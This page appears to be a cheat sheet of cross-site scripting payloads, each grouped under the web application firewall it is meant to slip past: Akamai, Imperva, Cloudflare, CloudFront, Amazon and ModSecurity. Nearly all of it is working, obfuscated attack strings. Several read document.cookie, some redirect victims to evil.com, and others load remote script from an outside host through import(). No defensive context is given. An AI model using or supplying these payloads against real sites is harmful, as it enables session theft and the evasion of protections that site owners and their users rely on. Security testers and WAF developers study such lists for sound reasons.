💣WAF Bypass Payloads
// Bypass Akamai and Imperva WAF
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
// Cloudflare WAF bypass:
<Svg On Only=1 Onload=alert(1)>
<svg/onload=window["al"+"ert"]1337>
<img src=OnXSS OnError=alert(1)>
'"><img src=x onerrora=confirm() onerror=confirm(1)>
'"><svg onloado=confirm() onload=confirm(1) onloado=confirm()>
"%20>%20/*<Svg%20Only=1%20onmouseover=confirm()>*///
<Img Src=OnXSS OnError=confirm("XSS-Cloudflare-bypass-By-Asad")>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert(document.cookie)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<Img Src=OnXSS OnError=confirm(document.cookie)>
<a AutoFocus contenteditable OnFocus=prompt`${origin}`>
<a AutoFocus contenteditable OnFocus="javascript:prompt`${origin}`">
'"><svg/onload="location.replace('https://evil.com')"
tester<a href=http://evil.com>reopen your</a>
"location.replace('https://evil.com')"
<iframe src="javascript:prompt`${origin}`" xss="">
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
---------------------------------
// Akamai WAF bypass:
';k='e'%0Atop['al'+k+'rt'](1)//
1'"><A HRef=\" AutoFocus OnFocus=('ale'+'rt')(origin)>
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
javascript:top[/al/.source+/ert/.source](document.cookie)
<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>
1'"><INPUT HRef=\" AutoFocus OnFocus="var a='ale';var b='rt';var c='()';top[a+b]`11`"><"
--------------------------------
// Imperva WAF bypass:
xss"><input%20type=hidden%20oncontentvisibilityautostatechange=alert?.%26lpar;)%20style=content-visibility:auto>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<svg/onload=self[`aler`%2b`t`]`1`>
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=alert(origin)>
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
--------------------------------
// Cloudfront WAF bypass:
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/aabb/['al'%2b'ert'](document./aabb/location);//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
'""><Svg+OnLoad=(alert)(1)>
--------------------------------
// Amazon WAF Bypass:
%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%601%60%3E
<img%2Fsrc%2Fonerror%3D.1%7Calert%601%60>
<img/src/onerror=.1|alert`1`>
--------------------------------
// Mod security WAF bypass:
<svg onload='new Function["Y000!"].find(al\u0065rt)'>Srored (Persistent) XSS Payloads
Last updated